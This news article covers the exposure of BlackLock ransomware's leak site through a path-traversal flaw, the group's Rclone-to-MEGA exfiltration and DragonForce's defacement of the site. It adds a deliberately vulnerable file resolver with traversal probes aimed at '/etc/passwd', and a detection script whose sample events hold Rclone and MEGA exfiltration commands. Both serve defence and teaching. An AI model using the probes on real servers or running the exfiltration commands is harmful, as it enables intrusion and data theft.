
BlackLock Ransomware Victim of Own Security Flaw


In a dramatic twist of cyber warfare, threat hunters have turned the tables on BlackLock ransomware, a fast-growing cybercrime syndicate, by infiltrating its own infrastructure and uncovering sensitive internal data that exposes the group’s operations.

The breakthrough came from cybersecurity firm Resecurity, which discovered a critical vulnerability in the group’s data leak site (DLS). The flaw, tied to a misconfigured server, allowed researchers to access configuration files, credentials, and even a detailed history of commands executed on the backend, shedding unprecedented light on BlackLock’s tactics.

According to Resecurity, the vulnerability revealed clearnet IP addresses tied to the group’s hidden Tor services, breaking through the anonymity layer the operators relied on. In what is now being called one of the most significant operational security (OPSEC) failures in recent ransomware history, BlackLock’s veil has been lifted, at least in part.

Originally operating under the name Eldorado, BlackLock rebranded and surged in activity throughout early 2025, emerging as a major player in the ransomware-as-a-service (RaaS) ecosystem. By February, the group had publicly listed 46 victims across sectors including finance, manufacturing, construction, retail, and technology.

Victims of BlackLock span multiple countries: from the United States and United Kingdom to Argentina, Aruba, Brazil, France, Italy, and the UAE, highlighting the group’s wide global footprint.

In January 2025, BlackLock launched an underground affiliate program to expand its reach. The group actively recruited traffers, low-level cybercriminals who funnel victims to malicious web pages that start infection chains. The malware delivered through those pages provides the initial access that affiliates later use for deeper intrusion and ransomware deployment.

The key vulnerability exploited by Resecurity was a Local File Inclusion (LFI) bug. By supplying path-traversal sequences (such as ../) in a file parameter, researchers tricked the web server into returning sensitive internal files. Path traversal is a staple of web penetration testing, but it is rarely pulled off this effectively against a live ransomware operation.
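To make the bug class concrete, here is an added example (written for this page, not code from BlackLock’s DLS or from Resecurity) of a file-serving helper in its LFI-prone form beside a hardened form. The web root path and the probe strings are assumptions chosen for illustration; the naive “strip ../ once” filter in the vulnerable version is a common but ineffective mitigation, and the doubled probe shows why.

```python
import os

# Assumed web root for the example; real deployments differ.
WEB_ROOT = "/var/www/dls"

# Constructed request values an attacker (or a pentester) might send in a
# file/page parameter. Decoding of %2e%2e%2f etc. is assumed to have
# already happened in the web framework before these functions are called.
PROBES = [
    "index.html",                      # legitimate
    "logs/../config.php",              # traversal that stays inside the root
    "../../../etc/passwd",             # plain traversal
    "....//....//....//etc/passwd",    # survives a single replace of '../'
    "/etc/passwd",                     # absolute path: os.path.join drops the root
]


def resolve_vulnerable(web_root: str, requested: str) -> str:
    """LFI-prone resolution.

    Applies the classic half-measure of deleting '../' once, then joins the
    result onto the web root. '....//' collapses to '../' after one deletion,
    and an absolute path makes os.path.join discard the root entirely.
    """
    cleaned = requested.replace("../", "")
    return os.path.normpath(os.path.join(web_root, cleaned))


def resolve_hardened(web_root: str, requested: str):
    """Canonicalise and enforce containment; return None for anything outside.

    Rejects NUL bytes and absolute paths up front, then resolves the candidate
    with realpath (which also follows symlinks) and checks that the web root
    is a prefix of the resolved path at a directory boundary.
    """
    if "\x00" in requested or requested.startswith(("/", "\\")):
        return None
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def compare(web_root: str = WEB_ROOT) -> dict:
    """Map each probe to (vulnerable result, hardened result) for inspection."""
    return {p: (resolve_vulnerable(web_root, p), resolve_hardened(web_root, p))
            for p in PROBES}


if __name__ == "__main__":
    for probe, (bad, good) in compare().items():
        print(f"{probe!r:38} vulnerable -> {bad:32} hardened -> {good}")
```

The containment check uses `commonpath` rather than `startswith` so that a root of `/var/www/dls` does not accept `/var/www/dls-private/secret`; the `realpath` call matters because a symlink inside the web root pointing at `/etc` would otherwise pass a purely lexical check.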

Among the most revealing findings:

  • BlackLock operators used Rclone to siphon stolen data to MEGA cloud storage, at times installing the MEGA client directly on victim systems.
  • Researchers traced at least eight MEGA accounts created using disposable YOPmail addresses, such as “[email protected].”
  • Source code and ransom notes bear strong resemblance to another known ransomware family, DragonForce, which previously targeted Saudi Arabian entities. While DragonForce is written in Visual C++, BlackLock’s variant is developed in Go.
  • A key figure known as “$$$” briefly operated another ransomware strain, Mamona, launched on March 11, 2025, suggesting internal splits or experimental offshoots within the group.
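The Rclone-to-MEGA exfiltration pattern in the first two findings is something defenders can hunt for in endpoint telemetry. The following is an added example (not Resecurity’s tooling or any BlackLock artifact) of simple detection logic run over a handful of constructed process-creation events in a simplified Sysmon Event ID 1 shape. The hostnames, users, paths and command lines are all invented; the MEGA client binary names (MEGAsync.exe, MEGAclient.exe, MEGAcmdServer.exe, mega-put) and the rule names are assumptions for illustration, and the `rclone copy` / `rclone config create` syntax is standard Rclone usage.

```python
import re

# Constructed process-creation events (simplified Sysmon Event ID 1 fields).
# Invented for this example; not real telemetry from any BlackLock intrusion.
EVENTS = [
    {"host": "fs01", "user": "CORP\\svc_backup",
     "image": "C:\\Windows\\Temp\\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Shares\\Finance mega:exfil --transfers 32 --config C:\\Windows\\Temp\\r.conf"},
    {"host": "fs01", "user": "CORP\\svc_backup",
     "image": "C:\\Windows\\Temp\\rclone.exe",
     "cmdline": "rclone.exe config create mega mega user x@yopmail.com pass hunter2"},
    {"host": "ws17", "user": "CORP\\alice",
     "image": "C:\\Users\\alice\\AppData\\Local\\MEGAsync\\MEGAsync.exe",
     "cmdline": "MEGAsync.exe"},
    {"host": "ws17", "user": "CORP\\alice",
     "image": "C:\\Users\\alice\\AppData\\Local\\MEGAcmd\\MEGAclient.exe",
     "cmdline": "mega-put -c D:\\HR\\payroll.zip /backup"},
    {"host": "build02", "user": "CORP\\ci",
     "image": "C:\\Program Files\\rclone\\rclone.exe",
     "cmdline": "rclone.exe sync C:\\artifacts s3:ci-artifacts"},   # benign baseline
]

# Directories from which an rclone binary should never normally run.
SUSPICIOUS_DIRS = re.compile(r"\\(temp|tmp|users\\public|programdata|downloads)\\", re.I)
# A remote named/typed 'mega' on the rclone command line: 'mega:' as a
# destination, or 'config create <name> mega ...' when the remote is set up.
MEGA_REMOTE = re.compile(r"\bmega:", re.I)
MEGA_CONFIG = re.compile(r"config\s+create\s+\S+\s+mega\b", re.I)
# Assumed MEGA client binary names (lower-cased basenames).
MEGA_CLIENTS = {"megasync.exe", "megaclient.exe", "megacmdserver.exe", "mega-put", "mega-put.bat"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the list of (hypothetical) rule names that fire on one event."""
    image = _basename(event["image"])
    cmd = event["cmdline"]
    hits = []
    if image == "rclone.exe" or cmd.lower().startswith("rclone"):
        if MEGA_REMOTE.search(cmd) or MEGA_CONFIG.search(cmd):
            hits.append("rclone_to_mega")
        if SUSPICIOUS_DIRS.search(event["image"]):
            hits.append("rclone_from_staging_dir")
    if image in MEGA_CLIENTS or cmd.lower().startswith("mega-put"):
        hits.append("mega_client_execution")
    return hits


def detect(events: list) -> list:
    """Run every event through classify() and keep only those with findings."""
    findings = []
    for ev in events:
        rules = classify(ev)
        if rules:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "rules": rules, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['host']:8} {f['user']:18} {', '.join(f['rules']):40} {f['cmdline']}")
```

The benign build server that syncs artifacts to S3 from an installed Rclone produces no finding, which is the point of combining the remote type with the binary’s location rather than alerting on every Rclone execution. In production the rules would be enriched with the `--config` path (a config file written to a temp directory is itself worth a look) and with network telemetry to MEGA’s API hosts, but the page gives no such indicators, so none are invented here.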

The plot thickened on March 20, when BlackLock’s DLS was defaced by DragonForce. Configuration files and internal chat logs were dumped on its landing page in an apparent hijack. One day earlier, Mamona’s site had also been defaced. Security experts believe DragonForce may have exploited the same LFI flaw—raising questions about whether this was a coordinated takeover, retaliation, or a sign of deeper collaboration.

Resecurity noted that the hacker known as “$$$” showed no reaction after these breaches. That silence, combined with the timing, suggests the actor may have already anticipated the collapse and quietly exited the scene before things escalated.

While it remains unclear if BlackLock is now under new ownership or merging into DragonForce, experts say this could reflect a larger trend of ransomware market consolidation. With heightened law enforcement pressure and increased surveillance from the infosec community, smaller ransomware operations are either folding or joining forces under larger, more resilient umbrellas.

This rare glimpse into BlackLock’s backend highlights both the rising complexity of modern ransomware groups and their vulnerabilities. While cybercriminals continue to evolve, this incident shows that even the most elusive actors can make critical mistakes—and when they do, it creates valuable openings for defenders to strike back.
